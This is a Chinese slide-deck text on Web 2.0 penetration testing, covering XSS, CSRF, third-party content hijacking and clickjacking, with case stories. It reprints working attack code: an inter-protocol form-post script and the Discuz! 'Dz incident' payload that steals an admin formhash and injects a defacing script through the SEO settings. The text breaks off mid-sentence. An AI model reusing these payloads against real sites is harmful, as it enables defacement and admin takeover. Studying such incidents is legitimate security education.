WEB2.0安全

WEB2.0下的渗透测试5up3rh3i@gmail.comWEB1.0下的渗透测试•通过web服务器漏洞直接溢出得到cmdshelliis60day.bin–t–p80•通过web应用程序传统漏洞得到webshell传统漏洞是指作用于web服务端语言的漏洞如上传、sql注射、包含等。phpwind0day.php–t–p80•主要特点属于服务端攻击，攻击效果“直截了当”，还是目前主流的渗透测试方式，但是寻找漏洞成本越来越高，安全产品的应用使利用越来越困难！关于WEB2.0•Web2.0一种相对概念,提倡的是高亲和力的交互应用，主体是用户之间用户与网站之间的互动。•Web2.0的核心注重的不仅是技术，而更注重的设计思想。AJAX技术的诞生标着web进入2.0时代，也是其核心技术web2.0更注重互动的设计思想如博客、wiki、sns网络等诞生•Web2.0下的渗透继承了web2.0的特点：思想更重要！WEB2.0下的渗透测试•攻击的目标•主要的攻击方式：XSS、CSRF、第三方内容劫持、Clickjacking等。•攻击方式的趋势走向•攻击成功后的效果•现有的认识•几个渗透小故事攻击的目标•与WEB1.0相比，WEB2.0渗透是针对客户端的攻击。•包括网站用户，网站的管理员，网站的运维、安全人员，还包括和你一样的“渗透者”。主要的攻击方式--XSS•XSS在web1.0诞生，在web2.0时代出名。1996年就有人提到了这类攻击。[JeremiahGrossman说的]1999年DavidRoss和GeorgiGuninski提出“Scriptinjection”。2000年apache官方一篇文档里正式取名“CrossSiteScripting”。2005年samyworm诞生，标志着XSS进入web2.0时代，xss火了！！2007年出版的《XSSAttacksBook》提出：“XSSistheNewBufferOverflow,JavaScriptMalwareisthenewshellcode”•XSS的利用：web1.0时代：弹筐[alert()]+收集cookie[document.cookie]web2.0时代：xssworm这也是目前xss的主流利用！我们思想还处于90年代！这也是广大脚本小子被bs的原因之一！•XSS=/=弹筐+收集cookie+wormxss本质是在于执行脚本[javascript/html等]，而一个javascript就足够让你黑遍这个世界！主要的攻击方式--CSRF•CSRF---CrossSiteRequestForgery诞生于2000年，火于2007/2008年。得益于XSS的光芒，及几大web2.0的应用如gmail的CSRF漏洞。•直译为：“跨站请求伪造”。“跨”是它的核心。*跨httpsite**攻防技术已经趋于成熟如《BypassPreventingCSRF》2008年对于csrf的防御**CSRFworm我在2008.01年blog提到过这个概念,2008.0980sec实现《百度HiCsrf蠕虫攻击》*跨协议通信《Inter-ProtocolCommunication》—byWadeAlcorn2006年，让通过客户端攻击用户本地电脑其他服务变为可能。如下代码在webkit下实现了http与irc的通信：scriptgibson=document.createElement(form);gibson.setAttribute(name,B);gibson.setAttribute(target,A);gibson.setAttribute(method,post);gibson.setAttribute(action,);gibson.setAttribute(enctype,multipart/from-data);crashoverride=document.createElement(textarea);crashoverride.setAttribute(name,C);postdata=USERABCD\nNickxxxx\n;crashoverride.setAttribute(value,postdata);crashoverride.innerText=postdata;crashoverride.innerHTML=postdata;gibson.appendChild(crashoverride);document.body.appendChild(gibson);gibson.submit();/script主要的攻击方式--CSRF•从其他应用程序发起的跨站请求如wordwinrar等文件。主要的攻击方式--第三方内容劫持•《TheDangersofThirdPartyContent》---bySanJoseOWASP-WASCAppSec20072009年开始天朝红火了一把:《Dz事件》（在后面讲具体提到）•广告业务、网页游戏、统计服务导致第三方内容应用广泛。•web应用程序里的第三方内容，比如bbs官方升级提示功能等•其他应用程序里的第三方内容，如浏览器插件里的引入的jshtml等。•包括JavaScript,HTML,Flash,CSS,etc.主要的攻击方式--第三方内容劫持•又一个个“引狼入室”的悲剧故事。•劫持第三方内容的方法：*域名劫持如百度事件：直接攻击域名注册商*会话劫持：如arp会话劫持（zxarps.exe）、交换机会话劫持（SSClone）*直接攻取第三方内容服务器权限。“恩，很黄很暴力！”•目前基本没有安全防御意识。“你的安全被别人做了主了!”主要的攻击方式--Clickjacking•Clickjacking--点击劫持*byJeremiahGrossmanandRobertHansenin2008，立刻红火！*WEB2.0安全进入“美工黑客”时代！*安全防御者的恶梦，一个新的httpheader诞生：X-Frame-Options•衍生出的其他UI劫持如：Tapjacking“触摸劫持”攻击方式的趋势走向19901992199419961998200020022004200620082010XSSCSRFThirdClick诞生红火•攻击方式越来越“猥琐”，没有最“猥琐”只有更“猥琐”。•新的攻击方式从诞生到红火时间越来越短。攻击成功后的效果•从上面的攻击方式来看，它们有一个共同的目标：“劫持你的浏览器”。“哪里有浏览器哪里就有攻击！”•“劫持你的浏览器”的效果就是你的“身份被劫持”•所以攻击目标的“身份”决定了“渗透思想”攻击成功后的效果•劫取你的隐私网站的普通用户如常见的取得你ID、密码、cookie、联系等•劫取你的权限网站管理人员如网站的后台，进一步通过后台得到网站的权限等•劫取你的系统所有用户如利用浏览器的漏洞，或者通过跨协议利用你系统上其他服务的漏洞得到你的系统权限，或者取得本地系统上文件的读写能力等•劫取你的“内网”公司成员，这个又因在内网的身份不同而不同，如分开发测试员、运维人员、内部网络管理人员、安全测试人员等等。如通过攻击程序员的开发环境，直接取得内网系统的权限目前对于WEB2.0渗透测试的认识•Web2.0渗透==xss==弹筐+收集cookie+worm•Web2.0渗透==Mailxssoffice等软件0day钓鱼•Web2.0渗透==Xssshell、Beef、Anehta这些xss攻击平台工具。•看了下面的几个故事，或许有所改变几个渗透小故事•【黑遍全世界】----谈谈“Dz事件”•【螳螂捕蝉】----谈谈“渗透者自身的安全”•【本地web开发测试环境的安全隐患】•【来自“漏洞库”的漏洞】•【是谁想动了我的奶酪?】【黑遍全世界】之“Dz事件”•名词解释：“Dz事件”是指2009年1月8日一大批的Discuz!论坛的首页被篡改为“Hackedbyring04h,justforfun!”的事件。•官方通告：“本次安全问题系由域名劫持造成，Discuz!各版本软件代码在安全上并无问题”•事件的根本原因是“第三方内容劫持”，这里“第三方内容”具体是指“后台升级提示系统”引入位于!_5.5.0_SC_GBK\upload\admin\global.func.php：echo'scriptlanguage=JavaScriptsrc=='.rawurlencode(DISCUZ_VERSION).'&release='.rawurlencode(DISCUZ_RELEASE).'&php='.PHP_VERSION.'&mysql='.$dbversion.'&charset='.rawurlencode($charset).'&bbname='.rawurlencode($bbname).'&members='.$members.'&threads='.$threads.'&posts='.$posts.'&md5hash='.md5(preg_replace(/http:\/\/(.+?)\/.*/i,\\1,$_SERVER['HTTP_REFERER']).$_SERVER['HTTP_USER_AGENT'].DISCUZ_VERSION.DISCUZ_RELEASE.$bbname.$members.$threads.$posts).'/script';从官方通告来看ring04h正是通过攻击的目的！被劫持后的代码片段：//获取FORMHASHxmlhttp.open(GET,siteurl+admincp.php?action=home&sid=+sid,false);xmlhttp.send(null);vardatas=xmlhttp.responseText;varreg=/name=\formhash\value=\([\w\d]+)\/i;vararr=reg.exec(datas);varformhash=arr[1];//调用XMLHTTPPOST自定义数据xmlhttp.open(POST,siteurl+admincp.php?action=settings&edit=yes,false);xmlhttp.setRequestHeader(Referer,siteurl);xmlhttp.setRequestHeader(Content-Type,application/x-);xmlhttp.send(unescape(settingsnew%5Bseohead%5D=%3Cscript%3Efunction+init%28%29+%7B+document.write%28%27Hacked+by+ring04h%2C+just+for+fun%21%27%29%3B%7Dwindow.onload+%3D+init%3B%3C%2Fscript%3E%0D%0A&settingsubmit=+%CC%E1%BD%BB+&formhash=+formhash));}通过后台“seo设置”为过滤html的漏洞，插入js：scriptfunctioninit(){document.write('Hackedbyring04h,justforfun!');}window.onload=init;/script来达到篡改主页的目的！•本次事件是“善意”的，